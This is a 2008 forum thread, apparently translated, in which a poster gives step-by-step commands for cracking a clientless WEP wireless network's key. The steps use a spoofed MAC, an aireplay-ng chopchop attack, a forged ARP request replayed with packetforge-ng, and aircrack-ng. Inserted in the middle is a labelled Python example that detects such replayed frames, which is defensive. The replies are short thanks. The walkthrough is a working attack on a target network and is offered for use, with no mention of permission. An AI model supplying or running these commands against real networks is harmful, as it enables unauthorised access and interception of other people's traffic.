david98 posted on 2008-5-20 09:08

<p>We will also need to know the target's name (ESSID), MAC address, and the channel. Please note that my wireless device is "eth1" but yours may be different; use "iwconfig" to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor)<br/><font color="#0000ff" style="BACKGROUND-COLOR: #ffffff;">iwlist eth1 scan</font></p>
<p>Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.<br/><font color="#0000ff" style="BACKGROUND-COLOR: #ffffff;">rmmod ipw2200<br/>modprobe ipw2200 rtap_iface=1</font></p>
<p>Next enable wireless and change MAC (changing MAC is optional).<br/><font color="#0000ff">ifconfig eth1 up hw ether 00:11:22:33:44:55</font></p>
<p>Configure wireless w/ essid, channel, and a fake key.<br/><font color="#0000ff">iwconfig eth1 essid &lt;ESSID&gt; channel &lt;#&gt; key s:fakekey mode managed</font></p>
<p>Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.<br/><font color="#0000ff">airodump-ng --bssid &lt;AP MAC&gt; -w dump rtap0</font></p>
<p>Now for the actual injection. Open a new terminal (&lt;ctrl&gt;&lt;alt&gt;&lt;F2&gt; if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).<br/><font color="#0000ff">aireplay-ng -4 -a &lt;AP MAC&gt; -h 00:11:22:33:44:55 -i rtap0 eth1</font></p>
<p>A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream (.xor) file. The keystream file will look something like "<font color="#ff0000">replay_dec-######.xor</font>"</p>
<p>Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.</p>
<p>Now we will create an arp-request packet using the acquired keystream file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack runs faster if it is an arbitrary IP.<br/><font color="#0000ff">packetforge-ng -0 -a &lt;AP MAC&gt; -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y <font color="#ff0000">replay_dec-####.xor</font> -w arp-request</font></p>
<p>Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.<br/><font color="#0000ff">aireplay-ng -2 -r arp-request eth1</font></p>
<p>Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (&lt;ctrl&gt;&lt;alt&gt;&lt;F3&gt;). Within a few minutes you should have the key.<br/><font color="#ff0000">aircrack-ng -z dump*.cap</font></p>
<p><font color="#ff0000">Could someone translate the key parts? Thanks.</font></p>
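
Added example, not part of david98's post or of aircrack-ng: the last injection step resends one forged ARP request unchanged, so a monitoring sensor sees the same transmitter, WEP IV and frame length repeat far faster than normal traffic reuses an IV. The sketch below flags that pattern in per-frame records; the record layout, the sample frames and the 50-per-second threshold (set below the rate range the post quotes) are assumptions made for illustration.

```python
from collections import defaultdict, deque

def build_sample():
    """Constructed capture summary: (time_s, transmitter MAC, WEP IV hex, frame length)."""
    frames = []
    # Ordinary client traffic: every frame carries a fresh IV.
    for i in range(20):
        frames.append((i * 0.05, "aa:bb:cc:00:00:01", f"{0x100 + i:06x}", 120 + i))
    # Replay: one frame resent unchanged, 200 times in one second.
    for i in range(200):
        frames.append((1.0 + i * 0.005, "00:11:22:33:44:55", "0a0b0c", 68))
    return sorted(frames)

def detect_replay(frames, window=1.0, threshold=50):
    """Flag (MAC, IV, length) triples seen >= threshold times within window seconds.

    Returns {triple: time the threshold was first crossed}.
    """
    recent = defaultdict(deque)   # triple -> timestamps still inside the window
    flagged = {}
    for ts, mac, iv, length in frames:
        key = (mac, iv, length)
        seen = recent[key]
        seen.append(ts)
        # Drop sightings that have aged out of the sliding window.
        while ts - seen[0] > window:
            seen.popleft()
        if len(seen) >= threshold and key not in flagged:
            flagged[key] = ts
    return flagged

if __name__ == "__main__":
    for (mac, iv, length), ts in detect_replay(build_sample()).items():
        print(f"{ts:.3f}s replay suspected: {mac} IV={iv} len={length}")
```

An alert of this kind is also a prompt to move the network off WEP, since the whole procedure depends on WEP accepting a replayed frame.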

sy100 posted on 2008-5-20 09:27

<p>Thanks! I'll study this some more!!</p>

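a191442029 posted on 2008-5-20 09:48

This one deserves a bump. With the earlier method, at the last step the capture showed data, but the ARP count stayed at 0 the whole time. I'll try this one.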

ljq228 posted on 2008-5-20 10:10

dddddddddddddd

chenguo posted on 2008-5-20 12:42

Thanks for the expert guidance, I'll give it a try!

meteor56 posted on 2008-5-20 12:54

<p>Let me study this and see whether I can get it working.</p>

shjdwdf posted on 2008-5-20 13:08

<p>I have to reply to this one; your posts don't mislead people.</p>

wuhaoling posted on 2008-5-20 13:38

<p>Well written, I hope you keep it up.</p>

wuhaoling posted on 2008-5-20 13:38

<div id="textstyle_71223" style="FONT-SIZE: 10pt;"><p>I want to take a look at this.</p></div>

videre posted on 2008-5-20 14:25

What is the difference between the two posts?

zxcvb posted on 2008-5-20 15:38

<p>There is a lot here I don't know. Is it OK if I take a look?</p>

beerli posted on 2008-5-20 16:52

Replying to have a look and learn; there is a lot I don't understand, haha!
View full version: Injection-based cracking of clientless WEP with the INTEL 2200bg